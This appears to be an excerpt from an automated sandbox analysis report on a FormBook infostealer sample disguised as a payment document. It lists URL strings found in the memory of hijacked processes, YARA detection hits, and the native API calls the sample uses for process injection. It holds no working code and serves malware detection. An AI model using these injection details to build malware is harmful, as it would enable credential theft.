                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Exo
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033t
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: systeminfo.exe, 00000007.00000002.4105934203.0000000000A09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: systeminfo.exe, 00000007.00000003.2209426415.0000000007825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/css/parking2.css
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://plus.google.com/u/0/102310483732773374239
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/piensasolutions
                Source: systeminfo.exe, 00000007.00000002.4109041108.0000000007848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005F96000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000003846000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dom
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=host
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensa
                Source: lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002D48000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/cloudhost/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/jiaoyi/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/domain/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/mail/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/webhosting/
                Source: systeminfo.exe, 00000007.00000002.4108897499.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4107343980.0000000005306000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.0000000002BB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/ykj/view.asp?domain=cotti.club

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Payment&WarantyBonds.exe
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D2294 NtQueryInformationProcess,0_2_066D2294
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D6308 NtQueryInformationProcess,0_2_066D6308
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0042C483 NtClose,2_2_0042C483
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842B60 NtClose,LdrInitializeThunk,2_2_01842B60
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01842DF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01842C70
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018435C0 NtCreateMutant,LdrInitializeThunk,2_2_018435C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01844340 NtSetContextThread,2_2_01844340
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01844650 NtSuspendThread,2_2_01844650
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842B80 NtQueryInformationFile,2_2_01842B80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842BA0 NtEnumerateValueKey,2_2_01842BA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842BE0 NtQueryValueKey,2_2_01842BE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842BF0 NtAllocateVirtualMemory,2_2_01842BF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842AB0 NtWaitForSingleObject,2_2_01842AB0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842AD0 NtReadFile,2_2_01842AD0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842AF0 NtWriteFile,2_2_01842AF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842DB0 NtEnumerateKey,2_2_01842DB0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842DD0 NtDelayExecution,2_2_01842DD0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842D00 NtSetInformationFile,2_2_01842D00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842D10 NtMapViewOfSection,2_2_01842D10
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842D30 NtUnmapViewOfSection,2_2_01842D30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842CA0 NtQueryInformationToken,2_2_01842CA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842CC0 NtQueryVirtualMemory,2_2_01842CC0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842CF0 NtOpenProcess,2_2_01842CF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842C00 NtQueryInformationProcess,2_2_01842C00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842C60 NtCreateKey,2_2_01842C60
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842F90 NtProtectVirtualMemory,2_2_01842F90
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842FA0 NtQuerySection,2_2_01842FA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842FB0 NtResumeThread,2_2_01842FB0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842FE0 NtCreateFile,2_2_01842FE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842F30 NtCreateSection,2_2_01842F30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842F60 NtCreateProcessEx,2_2_01842F60
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842E80 NtReadVirtualMemory,2_2_01842E80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842EA0 NtAdjustPrivilegesToken,2_2_01842EA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842EE0 NtQueueApcThread,2_2_01842EE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01842E30 NtWriteVirtualMemory,2_2_01842E30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01843090 NtSetValueKey,2_2_01843090
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01843010 NtOpenDirectoryObject,2_2_01843010
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018439B0 NtGetContextThread,2_2_018439B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01843D10 NtOpenProcessToken,2_2_01843D10
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01843D70 NtOpenThread,2_2_01843D70
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04724650 NtSuspendThread,LdrInitializeThunk,7_2_04724650
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04724340 NtSetContextThread,LdrInitializeThunk,7_2_04724340
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04722C70
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722C60 NtCreateKey,LdrInitializeThunk,7_2_04722C60
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04722CA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_04722D30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04722D10
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04722DF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722DD0 NtDelayExecution,LdrInitializeThunk,7_2_04722DD0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722EE0 NtQueueApcThread,LdrInitializeThunk,7_2_04722EE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_04722E80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722F30 NtCreateSection,LdrInitializeThunk,7_2_04722F30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722FE0 NtCreateFile,LdrInitializeThunk,7_2_04722FE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722FB0 NtResumeThread,LdrInitializeThunk,7_2_04722FB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722AF0 NtWriteFile,LdrInitializeThunk,7_2_04722AF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722AD0 NtReadFile,LdrInitializeThunk,7_2_04722AD0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722B60 NtClose,LdrInitializeThunk,7_2_04722B60
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04722BF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04722BE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_04722BA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047235C0 NtCreateMutant,LdrInitializeThunk,7_2_047235C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047239B0 NtGetContextThread,LdrInitializeThunk,7_2_047239B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722C00 NtQueryInformationProcess,7_2_04722C00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722CF0 NtOpenProcess,7_2_04722CF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722CC0 NtQueryVirtualMemory,7_2_04722CC0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722D00 NtSetInformationFile,7_2_04722D00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722DB0 NtEnumerateKey,7_2_04722DB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722E30 NtWriteVirtualMemory,7_2_04722E30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722EA0 NtAdjustPrivilegesToken,7_2_04722EA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722F60 NtCreateProcessEx,7_2_04722F60
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722FA0 NtQuerySection,7_2_04722FA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722F90 NtProtectVirtualMemory,7_2_04722F90
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722AB0 NtWaitForSingleObject,7_2_04722AB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04722B80 NtQueryInformationFile,7_2_04722B80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04723010 NtOpenDirectoryObject,7_2_04723010
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04723090 NtSetValueKey,7_2_04723090
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04723D70 NtOpenThread,7_2_04723D70
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04723D10 NtOpenProcessToken,7_2_04723D10
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005D8FE0 NtCreateFile,7_2_005D8FE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005D9140 NtReadFile,7_2_005D9140
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005D9230 NtDeleteFile,7_2_005D9230
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005D92D0 NtClose,7_2_005D92D0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005D9440 NtAllocateVirtualMemory,7_2_005D9440
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_007AEF040_2_007AEF04
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_00C06BE00_2_00C06BE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_00C010A80_2_00C010A8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_00C029080_2_00C02908
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_00C00C700_2_00C00C70
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_00C02D400_2_00C02D40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_00C007F80_2_00C007F8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D36580_2_066D3658
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D23880_2_066D2388
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D9E580_2_066D9E58
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D36490_2_066D3649
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D57200_2_066D5720
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D64900_2_066D6490
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D52E80_2_066D52E8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D23780_2_066D2378
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066DA0E80_2_066DA0E8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066DA0DA0_2_066DA0DA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D9E480_2_066D9E48
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D8B400_2_066D8B40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D8B310_2_066D8B31
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_066D5BE00_2_066D5BE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004184B32_2_004184B3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040E0532_2_0040E053
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004021962_2_00402196
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004012202_2_00401220
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0042EA832_2_0042EA83
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004023722_2_00402372
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004023802_2_00402380
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040FDAA2_2_0040FDAA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040FDB32_2_0040FDB3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004026D22_2_004026D2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004026E02_2_004026E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004166EE2_2_004166EE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004166F32_2_004166F3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004166AC2_2_004166AC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00402F102_2_00402F10
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040FFD32_2_0040FFD3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D01AA2_2_018D01AA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C41A22_2_018C41A2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C81CC2_2_018C81CC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018001002_2_01800100
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AA1182_2_018AA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018981582_2_01898158
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A20002_2_018A2000
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D03E62_2_018D03E6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0181E3F02_2_0181E3F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018CA3522_2_018CA352
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018902C02_2_018902C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B02742_2_018B0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D05912_2_018D0591
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018105352_2_01810535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BE4F62_2_018BE4F6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018B44202_2_018B4420
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C24462_2_018C2446
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180C7C02_2_0180C7C0
